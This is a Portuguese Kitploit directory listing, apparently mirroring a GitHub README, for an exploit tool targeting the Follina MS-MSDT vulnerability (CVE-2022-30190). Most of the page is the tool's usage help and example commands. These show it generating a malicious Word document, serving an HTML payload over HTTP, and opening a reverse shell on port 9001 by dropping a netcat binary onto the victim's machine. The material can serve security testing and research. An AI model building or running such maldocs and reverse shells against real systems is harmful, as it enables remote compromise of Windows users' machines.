Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
FOLLINA-CVE-2022-30190 — Implementação do FOLLINA-CVE-2022-30190 | Kitploit
Ferramentas/GitHubGitHub/toxicenvelope/follina-cve-2022-30190
Geração de PayloadsExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleRed Teaming
GitHubtoxicenvelope/follina-cve-2022-30190

FOLLINA-CVE-2022-30190

Implementação do FOLLINA-CVE-2022-30190

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ver Repositório
11há 3 anosAinda não revisado
Compartilhar

FOLLINA-CVE-2022-30190

Implementação do FOLLINA-CVE-2022-30190


Este repositório contém uma ferramenta de exploração para a vulnerabilidade FOLLINA-CVE-2022-30190

Aviso Legal

Esta ferramenta foi desenvolvida para fins de teste de segurança e pesquisa. Ao clonar/forkar esta ferramenta, o desenvolvedor original isenta-se de qualquer responsabilidade sobre as ações dos atores.


Pré-requisitos

  1. Leia sobre o CVE-2022-30190 aqui
  2. Prepare seu ambiente de teste (sugiro usar Virtual Box + Vagrant)
  • Baixe o VirtualBox aqui
  • Baixe o Vagrant aqui
  • Leia sobre a CLI do Vagrant aqui

Crie um ataque "Follina" MS-MSDT com um documento malicioso do Microsoft Word e hospede uma payload com um servidor HTTP.

Uso
root@kitploit:~
uso: exploit.py [-h] [--command COMMAND] [--output OUTPUT] [--interface INTERFACE] [--port PORT]

opções:
  -h, --help            mostra esta mensagem de ajuda e sai
  --command COMMAND
                        comando a ser executado no alvo (padrão: calc)
  --output OUTPUT 
                        arquivo maldoc de saída (padrão: ./follina.doc)
  --interface INTERFACE
                        interface de rede ou endereço IP para hospedar o servidor HTTP (padrão: eth0)
  --port PORT           
                        porta para servir o servidor HTTP (padrão: 8000)

Exemplos

Abra o calc.exe:

root@kitploit:~
$ python3 exploit.py   
[+] copiando documento temporário /tmp/9mcvbrwo
[+] criado maldoc ./cve202230190.doc
[+] servindo payload HTML em :8000

Abra o cmd.exe:

root@kitploit:~
$ python3 exploit.py --command "cmd"

Obtenha uma reverse shell na porta 9001. Nota: isso baixa um binário netcat na vítima e o coloca em C:\Windows\Tasks. Ele não limpa o binário. Isso acionará detecções de antivírus a menos que o AV esteja desabilitado.

root@kitploit:~
$ python3 exploit.py --reverse 9001
Baixar ferramenta